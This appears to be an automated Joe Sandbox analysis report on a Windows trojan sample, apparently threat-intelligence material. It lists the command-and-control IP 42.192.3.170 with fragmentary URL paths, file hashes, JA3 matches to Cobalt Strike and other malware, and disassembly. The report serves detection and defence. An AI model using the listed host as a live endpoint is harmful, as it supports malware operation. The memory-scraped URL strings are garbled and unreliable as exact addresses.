          https://42.192.3.170/FyZah650lHL.exe, 00000000.00000003.2058516201.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3347918530.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1851666148.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1832985511.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000002.4114142159.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1813737040.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1982892951.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2232239149.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1963443471.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2002388791.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3427840081.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2176453491.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2078970685.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2383203450.00000000007EB000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://42.192.3.170/dpixel$XyZah650lHL.exe, 00000000.00000003.2039804636.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://42.192.3.170/pixelQyZah650lHL.exe, 00000000.00000003.2021019035.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1982892951.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2002388791.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2039906619.00000000007EE000.00000004.00000020.00020000.00000000.sdmpfalse
            		unknown
            https://42.192.3.170/QyZah650lHL.exe, 00000000.00000003.2856843273.00000000007EB000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://42.192.3.170/dpixelayZah650lHL.exe, 00000000.00000003.3328362680.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1739759155.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3347918530.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1758268591.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3369785762.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2894333153.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1719918734.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3407302077.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3250525186.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3448145276.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3467626542.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1776453698.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2950128022.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://42.192.3.170/MyZah650lHL.exe, 00000000.00000003.2553907934.00000000007EE000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://42.192.3.170/dpixelMyZah650lHL.exe, 00000000.00000003.1739759155.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1719918734.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1944932015.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1963443471.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1701127794.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2176453491.00000000007EE000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              https://42.192.3.170/dpixelPyZah650lHL.exe, 00000000.00000003.3308921920.00000000007EE000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                https://42.192.3.170/nd-point:yZah650lHL.exe, 00000000.00000003.3230732408.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2440141638.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1719918734.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000002.4114142159.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3250525186.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2476981159.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2176453491.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2553907934.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2856843273.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2572561886.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2458872458.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2495218353.00000000007EE000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://42.192.3.170/pixelMyZah650lHL.exe, 00000000.00000003.1758268591.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1794973018.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1776453698.00000000007EB000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://42.192.3.170/dpixelQyZah650lHL.exe, 00000000.00000003.1963443471.00000000007EE000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  https://42.192.3.170/dpixelXuyZah650lHL.exe, 00000000.00000003.3031504097.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://42.192.3.170/dpixeltem32yZah650lHL.exe, 00000000.00000003.2856843273.00000000007EB000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://42.192.3.170/dpixelSyZah650lHL.exe, 00000000.00000002.4113948673.0000000000761000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://42.192.3.170/xelyZah650lHL.exe, 00000000.00000003.2440141638.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3427840081.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://42.192.3.170/dpixel7yZah650lHL.exe, 00000000.00000002.4113948673.0000000000761000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://42.192.3.170/dpixel#XyZah650lHL.exe, 00000000.00000003.2232239149.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2553907934.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2288370778.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://42.192.3.170/dpixel9yZah650lHL.exe, 00000000.00000003.3132490030.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1719918734.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1832985511.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3407302077.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1813737040.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2630411066.00000000007EB000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://42.192.3.170/pixel1b87bd06yZah650lHL.exe, 00000000.00000003.1739759155.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1758268591.00000000007EB000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://42.192.3.170/yZah650lHL.exe, 00000000.00000003.2495218353.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2420843896.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2383203450.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1926725987.00000000007EE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://42.192.3.170/pixelyZah650lHL.exe, 00000000.00000003.2383203450.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1926725987.00000000007EE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://42.192.3.170/pixel9yZah650lHL.exe, 00000000.00000003.3153029603.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://42.192.3.170/dpixelHPyZah650lHL.exe, 00000000.00000003.3153029603.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3369785762.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3487466252.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2950128022.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3271622558.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://42.192.3.170/pixel(yZah650lHL.exe, 00000000.00000003.1758268591.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1776453698.00000000007EB000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://42.192.3.170/yyZah650lHL.exe, 00000000.00000003.1851666148.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1832985511.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1813737040.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1794973018.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1776453698.00000000007EB000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://42.192.3.170/dpixel=#yZah650lHL.exe, 00000000.00000003.2251319946.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2058516201.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1888943587.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2021019035.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2402005752.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1851666148.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1870269974.00000000007ED000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2894333153.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1832985511.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000002.4114142159.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3407302077.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1813737040.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1907581606.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1982892951.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1944932015.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2232239149.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1963443471.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2002388791.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2630411066.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2970624866.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3094866758.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://42.192.3.170/dpixeltzyZah650lHL.exe, 00000000.00000003.2495218353.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1944793809.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2058516201.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2077887934.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2364365771.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2476981159.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2232239149.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2553907934.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2440036654.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2021019035.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2420730874.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2345864498.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2288370778.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1982892951.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2325663976.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2458872458.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2251319946.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2039804636.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2176453491.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2572561886.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://42.192.3.170/dpixel)yZah650lHL.exe, 00000000.00000003.2251319946.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2288485933.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2058516201.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2345864498.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2021019035.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2402005752.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2306808221.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2325663976.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2364539586.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1907581606.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1982892951.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1944932015.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2232239149.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1963443471.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2002388791.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2176453491.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2078970685.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2039906619.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2856843273.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2270174330.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2383203450.00000000007EB000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://42.192.3.170/dpixel0yZah650lHL.exe, 00000000.00000003.2913198165.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1851666148.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2894333153.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2440141638.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1832985511.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1813737040.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2476981159.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2176453491.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2553907934.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2630411066.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2039906619.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2856843273.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2572561886.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2458872458.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2495218353.00000000007EE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://42.192.3.170/dpixelHGyZah650lHL.exe, 00000000.00000003.3153029603.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3191073968.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000002.4114142159.00000000007EB000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://42.192.3.170/pixel0yZah650lHL.exe, 00000000.00000003.3153029603.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://42.192.3.170/dpixel;XyZah650lHL.exe, 00000000.00000003.1944793809.00000000007A4000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  42.192.3.170
                  		unknownChina
                  		4249LILLY-ASUStrue

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1583548
                  Start date and time:2025-01-03 02:51:04 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 6m 37s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:5
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:yZah650lHL.exe
                  renamed because original name is a hash value
                  Original Sample Name:5ed55475a1fe6c18c1a67fa8c7008661.exe
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 15
                  • Number of non-executed functions: 165
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  20:51:54API Interceptor12349120x Sleep call for process: yZah650lHL.exe modified

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  LILLY-ASUShttps://ntta.org-pay-u5ch.sbs/us/Get hashmaliciousUnknownBrowse
                  • 43.166.134.219
                  DEMONS.spc.elfGet hashmaliciousUnknownBrowse
                  • 43.57.65.149
                  iDaD62by4N.exeGet hashmaliciousMetasploit, MeterpreterBrowse
                  • 43.136.177.76
                  Hilix.sh4.elfGet hashmaliciousMiraiBrowse
                  • 43.147.184.0
                  armv5l.elfGet hashmaliciousUnknownBrowse
                  • 40.201.14.36
                  armv7l.elfGet hashmaliciousUnknownBrowse
                  • 40.216.153.85
                  armv4l.elfGet hashmaliciousUnknownBrowse
                  • 43.68.215.233
                  armv6l.elfGet hashmaliciousUnknownBrowse
                  • 40.157.226.86
                  01012025.htmlGet hashmaliciousHTMLPhisherBrowse
                  • 43.152.64.207

                  JA3 Fingerprints

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  51c64c77e60f3980eea90869b68c58a81.exeGet hashmaliciousCobaltStrikeBrowse
                  • 42.192.3.170
                  test5.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                  • 42.192.3.170
                  A4FY1OA97K.lnkGet hashmaliciousDanaBotBrowse
                  • 42.192.3.170
                  EQ5Vcf19u8.exeGet hashmaliciousSocks5SystemzBrowse
                  • 42.192.3.170
                  EQ5Vcf19u8.exeGet hashmaliciousSocks5SystemzBrowse
                  • 42.192.3.170
                  vwZcJ81cpN.exeGet hashmaliciousSocks5SystemzBrowse
                  • 42.192.3.170
                  vwZcJ81cpN.exeGet hashmaliciousSocks5SystemzBrowse
                  • 42.192.3.170
                  r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                  • 42.192.3.170
                  gjEtERlBSv.exeGet hashmaliciousSocks5SystemzBrowse
                  • 42.192.3.170
                  gjEtERlBSv.exeGet hashmaliciousSocks5SystemzBrowse
                  • 42.192.3.170

                  Dropped Files

                  No context

                  Created / dropped Files

                  No created / dropped files found

                  Static File Info

                  General

                  File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                  Entropy (8bit):7.240070803648336
                  TrID:
                  • Win64 Executable (generic) (12005/4) 74.80%
                  • Generic Win/DOS Executable (2004/3) 12.49%
                  • DOS Executable Generic (2002/1) 12.47%
                  • VXD Driver (31/22) 0.19%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                  File name:yZah650lHL.exe
                  File size:328'704 bytes
                  MD5:5ed55475a1fe6c18c1a67fa8c7008661
                  SHA1:4ecc93379148eefce19f8f6ded6d141f7100bbcb
                  SHA256:57a370d35e41f662454ba59baeddf042cb536c75e92e6022a63de197fd1377ba
                  SHA512:11b6e14c6a7eb32491f23dd36fcdca6486e5e2180b9a66be6a269782e7df26ec13eadf850074bf432ae2584996a787df2e21856af7831184c29d5d5755d5dbb3
                  SSDEEP:6144:RjoxHcRTjI8tHsj/JWe59MRtJKBk7Yxt6W6/ur56jqOsljLmT:loSJTtHA759MRt8BMut6W6rGljLm
                  TLSH:47649D6DB7D8A52CC4374A30B5769E5EB09703CEAACDC7C51449B9383F60A8E2C6F854
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...."."....................@..............................p......E......... ............................

                  File Icon

                  Icon Hash:90cececece8e8eb0

                  Static PE Info

                  General

                  Entrypoint:0x4014c0
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                  DLL Characteristics:
                  Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                  TLS Callbacks:0x401ba0
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:147442e63270e287ed57d33257638324

                  Entrypoint Preview

                  Instruction
                  dec eax
                  sub esp, 28h
                  dec eax
                  mov eax, dword ptr [0004EFF5h]
                  mov dword ptr [eax], 00000001h
                  call 00007F2D00E11F4Fh
                  call 00007F2D00E1173Ah
                  nop
                  nop
                  dec eax
                  add esp, 28h
                  ret
                  nop word ptr [eax+eax+00000000h]
                  nop dword ptr [eax]
                  dec eax
                  sub esp, 28h
                  dec eax
                  mov eax, dword ptr [0004EFC5h]
                  mov dword ptr [eax], 00000000h
                  call 00007F2D00E11F1Fh
                  call 00007F2D00E1170Ah
                  nop
                  nop
                  dec eax
                  add esp, 28h
                  ret
                  nop word ptr [eax+eax+00000000h]
                  nop dword ptr [eax]
                  dec eax
                  sub esp, 28h
                  call 00007F2D00E133E4h
                  dec eax
                  test eax, eax
                  sete al
                  movzx eax, al
                  neg eax
                  dec eax
                  add esp, 28h
                  ret
                  nop
                  nop
                  nop
                  nop
                  nop
                  nop
                  nop
                  dec eax
                  lea ecx, dword ptr [00000009h]
                  jmp 00007F2D00E11A69h
                  nop dword ptr [eax+00h]
                  ret
                  nop
                  nop
                  nop
                  nop
                  nop
                  nop
                  nop
                  nop
                  nop
                  nop
                  nop
                  nop
                  nop
                  nop
                  nop
                  dec eax
                  jmp ecx
                  dec eax
                  arpl word ptr [00002AC2h], ax
                  test eax, eax
                  jle 00007F2D00E11AB8h
                  cmp dword ptr [00002ABBh], 00000000h
                  jle 00007F2D00E11AAFh
                  dec eax
                  mov edx, dword ptr [00052CFEh]
                  dec eax
                  mov dword ptr [ecx+eax], edx
                  dec eax
                  mov edx, dword ptr [00052CFBh]

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x540000x8d8.idata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x510000x2b8.pdata
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
